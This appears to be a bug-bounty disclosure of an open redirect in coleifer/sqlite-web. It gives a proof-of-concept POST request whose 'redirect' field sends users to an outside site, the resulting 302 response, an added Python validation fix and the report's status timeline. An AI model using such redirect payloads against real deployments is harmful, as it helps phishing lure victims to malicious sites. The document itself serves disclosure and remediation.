Open Redirection in coleifer/sqlite-web
Valid
Reported on Mar 26th 2022
Description
An open redirect security flaw allows an attacker to redirect victims of the application to malicious sites.
Proof of Concept
Request
POST /create-table/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/
Cookie: session=
Upgrade-Insecure-Requests: 1

redirect=http://google.com&table_name=
Response
HTTP/1.0 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 240
Location: http://google.com
Server: Werkzeug/2.0.2 Python/3.9.9
Date: Sat, 26 Mar 2022 11:45:25 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="http://google.com">http://google.com</a>. If not click the link.
Impact
Redirect to unsafe pages
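One way to constrain the `redirect` form field shown in the request above, as an added example (this is not the patch applied to sqlite-web and not code from the report). The function names and the `/` fallback are assumptions; only local paths are accepted, and anything a browser could resolve to another host is replaced by the fallback.

```python
from urllib.parse import parse_qsl, urlsplit

# Request body taken from the proof of concept above.
POC_BODY = "redirect=http://google.com&table_name="


def is_local_redirect(target):
    """Return True only for a path on this site, e.g. "/create-table/"."""
    # Must be an absolute path: rejects "", "http://...", "javascript:...".
    if not target or not target.startswith("/"):
        return False
    # "//host" is scheme-relative, and browsers treat "\" like "/",
    # so "/\host" and "///host" can also leave the site.
    if target.startswith("//") or "\\" in target:
        return False
    # Browsers strip tabs and newlines from URLs ("/\t/host" becomes
    # "//host"); control characters have no place in a redirect target.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return False
    # Defence in depth: the parser must see neither a scheme nor a host.
    parts = urlsplit(target)
    return parts.scheme == "" and parts.netloc == ""


def redirect_location(body, fallback="/"):
    """Parse a urlencoded form body and return a safe Location value.

    `fallback` (hypothetical default "/") is used whenever the supplied
    `redirect` value is missing or is not a local path.
    """
    form = dict(parse_qsl(body, keep_blank_values=True))
    target = form.get("redirect", "")
    return target if is_local_redirect(target) else fallback


if __name__ == "__main__":
    # The PoC body no longer yields "Location: http://google.com".
    print(redirect_location(POC_BODY))
    print(redirect_location("redirect=%2Fcreate-table%2F&table_name="))
```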
Occurrences
We are processing your report and will contact the coleifer/sqlite-web team within 24 hours.
a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md
a year ago
We have contacted a member of the coleifer/sqlite-web team and are waiting to hear back
a year ago
We have sent a follow up to the coleifer/sqlite-web team. We will try again in 7 days.
a year ago
Jamie Slome modified the report
a year ago
The maintainer has indicated that this does not have any security implications and so the severity has been assigned None.
I will approve and confirm the fix in any case, as this report was technically addressed with a patch.
The fix bounty has been dropped
This vulnerability will not receive a CVE
sqlite_web.py#L222 has been validated